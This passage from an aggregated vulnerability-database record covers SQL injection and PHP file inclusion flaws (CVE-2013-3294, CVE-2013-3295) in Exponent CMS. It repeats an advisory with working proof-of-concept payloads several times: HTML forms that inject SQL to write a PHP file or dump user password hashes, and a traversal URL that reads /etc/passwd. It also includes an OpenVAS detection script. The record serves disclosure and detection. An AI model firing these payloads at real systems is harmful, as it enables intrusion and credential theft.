\n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121643/exponentcms-lfisql.txt"}], "htbridge": [{"lastseen": "2020-12-24T11:12:38", "bulletinFamily": "software", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system. \n \n1) SQL Injection in Exponent CMS: CVE-2013-3294 \nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()': \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? 
phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295 \nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. 
\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system: \nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\n", "modified": "2013-05-06T00:00:00", "published": "2013-04-24T00:00:00", "id": "HTB23154", "href": "https://www.htbridge.com/advisory/HTB23154", "type": "htbridge", "title": "Multiple Vulnerabilities in Exponent CMS", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "description": "\r\n\r\nAdvisory ID: HTB23154\r\nProduct: Exponent CMS\r\nVendor: Online Innovative Creations\r\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\r\nTested Version: 2.2.0 beta 3\r\nVendor Notification: April 24, 2013 \r\nVendor Patch: May 3, 2013 \r\nPublic Disclosure: May 15, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\r\nCVE References: CVE-2013-3294, CVE-2013-3295\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.\r\n\r\n\r\n1) SQL Injection in Exponent CMS: CVE-2013-3294\r\n\r\nThe vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. 
A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()':\r\n\r\n\r\n<form action="http://[host]/index.php" method="post" name="main">\r\n<input type="hidden" name="action" value="login">\r\n<input type="hidden" name="int" value="1">\r\n<input type="hidden" name="module" value="login">\r\n<input type="hidden" name="password" value="password">\r\n<input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">\r\n<input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\nThe second PoC will attempt to create "/var/www/file.txt" file, containing usernames and hashed passwords of all application's users: \r\n\r\n\r\n<form action="http://[host]/index.php" method="post" name="main">\r\n<input type="hidden" name="action" value="login">\r\n<input type="hidden" name="int" value="1">\r\n<input type="hidden" name="module" value="login">\r\n<input type="hidden" name="password" value="password">\r\n<input type="hidden" name="src" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">\r\n<input type="hidden" name="username" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\r\n\r\nThe vulnerability is caused by improper filtration of user-supplied input passed via the "page" HTTP GET parameter to "/install/popup.php" script, which is publicly accessible after CMS installation by default. 
A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \r\n\r\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\r\n\r\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\r\n\r\nMore Information:\r\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\r\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.\r\n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:DOC:29587", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29587", "title": "Multiple Vulnerabilities in Exponent CMS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-4621", "CVE-2013-3635", "CVE-2013-3639", "CVE-2013-3514", "CVE-2013-3729", "CVE-2012-6458", "CVE-2013-3551", "CVE-2013-3294", "CVE-2013-3728", "CVE-2013-3295", "CVE-2013-3637", "CVE-2013-2624", "CVE-2013-4088", "CVE-2013-3515", "CVE-2013-3727", "CVE-2013-3636", "CVE-2013-1777", "CVE-2013-2621", "CVE-2013-3739", "CVE-2013-2623", "CVE-2013-3638"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13172", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13172", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-12T17:27:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "description": "This host is installed with Exponent CMS and is prone to multiple\n vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2013-05-23T00:00:00", "id": "OPENVAS:1361412562310803702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803702", "type": "openvas", "title": "Exponent CMS Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n#\n# Exponent CMS Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:exponentcms:exponent_cms\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803702\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-3294\", \"CVE-2013-3295\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-05-23 14:56:02 +0530 (Thu, 23 May 2013)\");\n script_name(\"Exponent CMS Multiple Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_exponet_cms_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"ExponentCMS/installed\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/May/57\");\n script_xref(name:\"URL\", 
value:\"http://packetstormsecurity.com/files/121643\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23154\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/526609\");\n script_xref(name:\"URL\", value:\"http://forums.exponentcms.org/viewtopic.php?f=16&t=789\");\n script_xref(name:\"URL\", value:\"http://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary SQL\n commands or include arbitrary PHP files from the local system using directory\n traversal sequences with URL-encoded NULL byte, read arbitrary files or execute\n arbitrary PHP code on the target system.\");\n\n script_tag(name:\"affected\", value:\"Exponent CMS version 2.2.0 beta 3 and prior\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to,\n\n - Insufficient filtration of 'src' and 'username' HTTP GET parameters passed\n to '/index.php' script. A remote unauthenticated attacker can execute\n arbitrary SQL commands in application's database.\n\n - Improper filtration of user-supplied input passed via the 'page' HTTP GET\n parameter to '/install/popup.php' script.\");\n\n script_tag(name:\"solution\", value:\"Update to Exponent CMS 2.2.0 Release Candidate 1 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Exponent CMS and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! 
dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\n\nfiles = traversal_files();\n\nforeach file( keys( files ) ) {\n\n url = dir + \"/install/popup.php?page=\" + crap( data:\"../\", length:3*15 ) + files[file] + \"%00\";\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T01:33:13", "description": "Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities. CVE-2013-3294. Webapps exploit for php platform", "published": "2013-05-17T00:00:00", "type": "exploitdb", "title": "Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294"], "modified": "2013-05-17T00:00:00", "id": "EDB-ID:25518", "href": "https://www.exploit-db.com/exploits/25518/", "sourceData": "Advisory ID: HTB23154\r\nProduct: Exponent CMS\r\nVendor: Online Innovative Creations\r\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\r\nTested Version: 2.2.0 beta 3\r\nVendor Notification: April 24, 2013 \r\nVendor Patch: May 3, 2013 \r\nPublic Disclosure: May 15, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\r\nCVE References: CVE-2013-3294, CVE-2013-3295\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and 
execute arbitrary PHP code on the vulnerable system.\r\n\r\n\r\n1) SQL Injection in Exponent CMS: CVE-2013-3294\r\n\r\nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()':\r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? 
phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n\r\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\r\n\r\nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. 
\r\n\r\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\r\n\r\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\r\n\r\nMore Information:\r\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\r\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.\r\n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25518/"}]}